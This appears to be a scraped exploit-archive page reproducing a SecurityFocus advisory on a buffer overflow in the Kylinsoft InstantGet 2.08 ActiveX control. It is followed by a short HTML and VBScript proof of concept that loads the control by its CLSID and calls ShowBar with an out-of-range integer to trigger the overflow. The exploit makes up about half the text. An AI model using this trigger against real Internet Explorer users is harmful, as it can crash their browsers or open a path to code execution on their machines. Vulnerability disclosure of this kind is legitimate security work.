21 lines
No EOL
894 B
HTML
21 lines
No EOL
894 B
HTML
source: http://www.securityfocus.com/bid/42418/info
|
|
|
|
Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.
|
|
|
|
Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.
|
|
|
|
<object classid='clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510' id='target' />
|
|
|
|
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
|
|
|
<script language='vbscript'>
|
|
|
|
arg1=-2147483647
|
|
|
|
target.ShowBar arg1
|
|
|
|
</script>
|
|
</span></span>
|
|
</code></pre> |